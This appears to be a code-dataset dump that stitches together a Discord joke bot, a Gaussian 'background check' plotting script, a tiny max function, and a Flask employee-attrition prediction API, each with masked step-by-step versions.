await client.say("Muhammad has " + str(mfc) + " funny coins")
@client.command()
async def chrisfc(cnum):
global cfc
cfc += int(cnum)
await client.say("Chris has " + str(cfc) + " funny coins")
@client.command()
async def antfc(anthnum):
global anfc
anfc += int(anthnum)
await client.say("Anthony has " + str(anfc) + " funny coins")
client.run(str(os.environ.get(TOKEN)))
|
normal
|
{
"blob_id": "f047afeb6462ab01a8fea1f3c8693608335eb960",
"index": 3488,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\n<mask token>\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-3": "<mask token>\nBOT_PREFIX = '!'\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-4": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nimport asyncio\nimport random\nimport requests\nimport os\nBOT_PREFIX = '!'\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-5": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nimport asyncio\nimport random\nimport requests\nimport os\n\n\n#Discord Tech Stuff\nBOT_PREFIX = (\"!\")\n\n\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n#Functions of the Funny Coin\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n \"Per the judgement from the committee of comedy, we have decided that the joke was indeed funny\",\n \"Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin\",\n ]\n await client.say(random.choice(possible_responses))\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\n \"Nah that wasn't really funny\",\n \"There is no funny present\",\n \"YOU FORGOT THE FUNNY\",\n \"There is no comedy present here\",\n \"hahaaaaa\",\n \"Funnt\",\n \"Hey man that's pretty funny thanks for sharing\",\n \"jajajajajajajajajaja\",\n ]\n await client.say(\"regarding \" + str(funny_subject) + \", \" + random.choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = [\n \"one irony point\",\n \"that's pretty ironic man\",\n \"ironic\",\n \"no irony present\",\n \"minus irony point\",\n \"where is the irony? I was told there would be irony?\",\n ]\n await client.say(random.choice(irony_responses))\n\n#Alex, Me, Chris, Anthony Coins, Want to add system that has coins for everyone and you can make a like profile for coins\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say(\"Alex has \" + str(afc) + \" funny coins\")\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say(\"Muhammad has \" + str(mfc) + \" funny coins\")\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say(\"Chris has \" + str(cfc) + \" funny coins\")\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say(\"Anthony has \" + str(anfc) + \" funny coins\")\n\n \n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.lines import Line2D
np.random.seed(42)
n_samples = 5000
MU = np.array([0.5, 1.5])
COV = np.array([[1., 0.7], [0.7, 2.]])
def get_samples(n):
return np.random.multivariate_normal(mean=MU, cov=COV, size=n)
class BackgroundCheck(object):
def __init__(self, model):
self.model = model
def fit(self, x):
self.model.fit(x)
def prob_foreground(self, x):
l = self.model.likelihood(x)
l_max = self.model.max
return np.true_divide(l, l_max)
def prob_background(self, x):
return 1 - self.prob_foreground(x)
def predict_proba(self, x):
return self.prob_background(x)
class GaussianEstimation(object):
def __init__(self):
self.mu = None
self.cov = None
self.N = 0
def fit(self, x):
N = x.shape[1]
mu = np.mean(x, axis=0)
cov = np.cov(x, rowvar=False)
if self.N is 0:
self.N = N
self.mu = mu
self.k = len(mu)
self.cov = cov
else:
self.mu = np.true_divide((self.mu * self.N) + (mu * N), self.N + N)
self.cov = np.true_divide((self.cov * self.N) + (cov * N), self.N + N)
self.N += N
def likelihood(self, x):
return np.exp(self.log_likelihood(x))
def log_likelihood(self, x):
x_mu = x - self.mu
# a = np.array([[1, 2]])
# b = np.array([[1, 2],[3,4]])
# np.inner(np.inner(a, b.T), a)
inverse = np.linalg.inv(self.cov)
exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])
return - 0.5 * (
np.log(np.linalg.det(self.cov))
+ exp \
+ self.k * np.log(2*np.pi)
)
@property
def max(self):
return self.likelihood(self.mu.reshape(1,-1))
model = BackgroundCheck(GaussianEstimation())
for i in range(n_samples/2):
x = get_samples(2)
model.fit(x)
x = get_samples(n_samples)
p_foreground = 1 - model.predict_proba(x)
fig = plt.figure('scatter')
fig.clf()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x[:,0], x[:,1], p_foreground)
ax.set_xlabel('$x_0$')
ax.set_ylabel('$x_1$')
ax.set_zlabel('p_foreground')
fig.savefig('p_foreground_x.svg')
X = np.linspace(min(x[:,0]), max(x[:,0]), 30)
Y = np.linspace(min(x[:,1]), max(x[:,1]), 30)
X, Y = np.meshgrid(X, Y)
grid = np.concatenate((X.reshape(-1,1), Y.reshape(-1,1)), axis=1)
p_foreground = 1 - model.predict_proba(grid).reshape(X.shape[0], X.shape[1])
fig = plt.figure('surface')
fig.clf()
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(X, Y, p_foreground, cmap=cm.coolwarm)
ax.set_xlabel('$x_0$')
ax.set_ylabel('$x_1$')
ax.set_zlabel('p_foreground')
fig.savefig('p_foreground_grid.svg')
|
normal
|
{
"blob_id": "d61b04539295f6b25e7f6589d32f313e3c6df82f",
"index": 1180,
"step-1": "<mask token>\n\n\nclass BackgroundCheck(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BackgroundCheck(object):\n <mask token>\n <mask token>\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BackgroundCheck(object):\n\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef get_samples(n):\n return np.random.multivariate_normal(mean=MU, cov=COV, size=n)\n\n\nclass BackgroundCheck(object):\n\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.lines import Line2D\n\nnp.random.seed(42)\n\nn_samples = 5000\nMU = np.array([0.5, 1.5])\nCOV = np.array([[1., 0.7], [0.7, 2.]])\n\ndef get_samples(n):\n return np.random.multivariate_normal(mean=MU, cov=COV, size=n)\n\nclass BackgroundCheck(object):\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide((self.mu * self.N) + (mu * N), self.N + N)\n self.cov = np.true_divide((self.cov * self.N) + (cov * N), self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n # a = np.array([[1, 2]])\n # b = np.array([[1, 2],[3,4]])\n # np.inner(np.inner(a, b.T), a)\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return - 0.5 * (\n np.log(np.linalg.det(self.cov))\n + exp \\\n + self.k * np.log(2*np.pi)\n )\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1,-1))\n\n\nmodel = BackgroundCheck(GaussianEstimation())\nfor i in range(n_samples/2):\n x = get_samples(2)\n model.fit(x)\n\nx = get_samples(n_samples)\n\np_foreground = 1 - model.predict_proba(x)\nfig = plt.figure('scatter')\nfig.clf()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(x[:,0], x[:,1], p_foreground)\nax.set_xlabel('$x_0$')\nax.set_ylabel('$x_1$')\nax.set_zlabel('p_foreground')\nfig.savefig('p_foreground_x.svg')\n\n\nX = np.linspace(min(x[:,0]), max(x[:,0]), 30)\nY = np.linspace(min(x[:,1]), max(x[:,1]), 30)\nX, Y = np.meshgrid(X, Y)\n\ngrid = np.concatenate((X.reshape(-1,1), Y.reshape(-1,1)), axis=1)\np_foreground = 1 - model.predict_proba(grid).reshape(X.shape[0], X.shape[1])\n\nfig = plt.figure('surface')\nfig.clf()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(X, Y, p_foreground, cmap=cm.coolwarm)\nax.set_xlabel('$x_0$')\nax.set_ylabel('$x_1$')\nax.set_zlabel('p_foreground')\nfig.savefig('p_foreground_grid.svg')\n",
"step-ids": [
8,
10,
12,
13,
17
]
}
|
[
8,
10,
12,
13,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def ex(x, y):
max = 0
print(x) if x > y else print(y)
return max
|
flexible
|
{
"blob_id": "4ffc00e9425992bdd8277341d67a0739119a4798",
"index": 2773,
"step-1": "<mask token>\n",
"step-2": "def ex(x, y):\n max = 0\n print(x) if x > y else print(y)\n return max\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
<|reserved_special_token_0|>
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
def predict_class(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict_proba(df)[:, 1])
else:
result = pd.Series(random.sample(range(1000), df.shape[0])).divide(
10000)
return result
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
<|reserved_special_token_0|>
def getPredictionByEmployee(companyid, accountid=None, predictdate=np.
datetime64('today')):
sys.stdout = open(utils.log_dir + time.strftime('%Y%m%d-%H%M%S') +
'_predict.txt', 'w')
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = (utils.model_dir + companyid +
'/classification/model.pkl')
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
if np.datetime64(predictdate) >= np.datetime64('today'):
strtodate = ''
else:
strtodate = np.datetime64(predictdate).astype(datetime.datetime
).strftime('%Y%m')
if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' +
strtodate + '.feather'):
df = feather.read_dataframe(utils.data_dir + companyid +
'/preparedData_test' + strtodate + '.feather')
else:
df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' +
strtodate + '.csv', low_memory=False)
feather.write_dataframe(df, utils.data_dir + companyid +
'/preparedData_test' + strtodate + '.feather')
if os.path.isfile(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather'):
df_1 = feather.read_dataframe(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather')
else:
df_1 = pd.read_csv(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df_1, utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather')
if accountid:
df = df.loc[(df['CompId'] == int(companyid)) & df['AccountId'].isin
(accountid)].reset_index(drop=True)
df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & df_1[
'AccountId'].isin(accountid)].reset_index(drop=True)
else:
df = df.loc[df['CompId'] == int(companyid)]
df_1 = df_1.loc[df['CompId'] == int(companyid)]
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId',
'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
print(datetime.datetime.now(), 'Predict for data', df_1.shape)
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame({'accountid': df[
'AccountId'], 'attritionproba': result_class, 'attritiondate':
result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
<|reserved_special_token_1|>
from . import preprocess
from . import utils
import random
import pickle
import feather
import time
import datetime
import sys
import os
import numpy as np
import pandas as pd
import json
from ...main import api
from flask import request
from flask_restplus import Resource, fields
import warnings
warnings.simplefilter("ignore")
predict_fields = api.model('Prediction Data', {
})
predict_accounts = api.model('Prediction Data By Employee', {
})
prediction = api.model('Prediction', {'attritionproba': fields.Float(
example=0.345), 'attritiondate': fields.String(example='2020-10-06T00:00:00.000Z')})
predictionByEmployee = api.model('Prediction By Employee', {})
model = api.model(
'Predictions', {'predictions': fields.List(fields.Nested(prediction))})
modelByEmployee = api.model(
'Predictions By Employee', {'predictions': fields.List(fields.Nested(predictionByEmployee))})
parser = api.parser()
parser.add_argument('predictdate', location='args', default=datetime.date.today().strftime("%Y-%m-%d"), help='Predict date', required=True)
@api.route("/predict")
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route("/predict/<string:companyid>/<string:accountid>")
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args['predictdate'])
@api.route("/predict/<string:companyid>")
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()['accountids'], args['predictdate'])
package_directory = os.path.dirname(os.path.abspath(__file__))
def predict_class(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict_proba(df)[:, 1])
else:
result = pd.Series(random.sample(
range(1000), df.shape[0])).divide(10000)
return result
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
def getPrediction(data, predictdate=np.datetime64('today')):
request_json = data
if request_json and 'instances' in request_json and 'companyid' in request_json and 'columns' in request_json:
sys.stdout = open(utils.log_dir + time.strftime("%Y%m%d-%H%M%S") + '_predict.txt', 'w')
# copy model
companyid = str(request_json['companyid'])
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = utils.model_dir + companyid + '/classification/model.pkl'
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
columns = request_json['columns']
df = pd.DataFrame(request_json['instances'], columns=columns)
df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', predictdate)
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame({'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
else:
return {'attritionproba': 0, 'attritiondate': ''}
def getPredictionByEmployee(companyid, accountid=None, predictdate=np.datetime64('today')):
sys.stdout = open(
utils.log_dir + time.strftime("%Y%m%d-%H%M%S") + '_predict.txt', 'w')
# copy model
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = utils.model_dir + companyid + '/classification/model.pkl'
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
if np.datetime64(predictdate) >= np.datetime64('today'):
strtodate = ''
else:
strtodate = np.datetime64(predictdate).astype(datetime.datetime).strftime('%Y%m')
if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather'):
df = feather.read_dataframe(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')
else:
df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df, utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')
if os.path.isfile(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather'):
df_1 = feather.read_dataframe(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')
else:
